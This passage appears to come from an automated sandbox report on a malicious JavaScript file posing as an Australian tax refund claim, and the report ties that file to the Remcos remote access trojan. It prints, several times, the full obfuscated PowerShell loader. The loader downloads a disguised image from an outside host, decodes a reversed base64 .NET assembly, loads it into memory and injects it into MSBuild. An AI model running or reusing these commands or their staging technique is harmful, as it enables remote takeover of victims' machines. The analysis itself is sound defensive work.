$txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	12_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00401806 NtdllDefWindowProc_W,	12_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_004018C0 NtdllDefWindowProc_W,	12_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004016FD NtdllDefWindowProc_A,	13_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004017B7 NtdllDefWindowProc_A,	13_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00402CAC NtdllDefWindowProc_A,	15_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00402D66 NtdllDefWindowProc_A,	15_2_00402D66

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

27_2_004158B9

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B500B9A	6_2_00007FFD9B500B9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044B040	12_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0043610D	12_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00447310	12_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044A490	12_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0040755A	12_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0043C560	12_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044B610	12_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044D6C0	12_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_004476F0	12_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044B870	12_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044081D	12_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00414957	12_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_004079EE	12_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00407AEB	12_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044AA80	12_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00412AA9	12_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00404B74	12_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00404B03	12_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044BBD8	12_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00404BE5	12_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00404C76	12_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00415CFE	12_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00416D72	12_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00446D30	12_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00446D8B	12_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00406E8F	12_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00405038	13_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041208C	13_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004050A9	13_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040511A	13_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043C13A	13_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004051AB	13_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00449300	13_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040D322	13_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044A4F0	13_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043A5AB	13_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00413631	13_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00446690	13_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044A730	13_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004398D8	13_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004498E0	13_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044A886	13_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043DA09	13_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00438D5E	13_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00449ED0	13_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041FE83	13_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00430F54	13_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004050C2	15_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004014AB	15_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00405133	15_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004051A4	15_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00401246	15_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0040CA46	15_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00405235	15_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004032C8	15_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00401689	15_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00402F60	15_2_00402F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004520E2	27_2_004520E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0041D081	27_2_0041D081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0043D0A8	27_2_0043D0A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00437160	27_2_00437160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004361BA	27_2_004361BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00426264	27_2_00426264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00431387	27_2_00431387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0043652C	27_2_0043652C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0041E5EF	27_2_0041E5EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0044C749	27_2_0044C749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004367D6	27_2_004367D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004267DB	27_2_004267DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0043C9ED	27_2_0043C9ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00432A59	27_2_00432A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00436A9D	27_2_00436A9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0043CC1C	27_2_0043CC1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00436D58	27_2_00436D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00434D32	27_2_00434D32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0043CE4B	27_2_0043CE4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00440E30	27_2_00440E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00426E83	27_2_00426E83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00412F45	27_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00452F10	27_2_00452F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00426FBD	27_2_00426FBD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004020E7 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004338B5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00416760 appears 69 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00433FC0 appears 55 times

Source: Tax_Refund_Claim_2024_Australian_Taxation_Office.js

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2353
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2395
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2353	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2395	Jump to behavior

Source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: powershell.exe PID: 7356, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
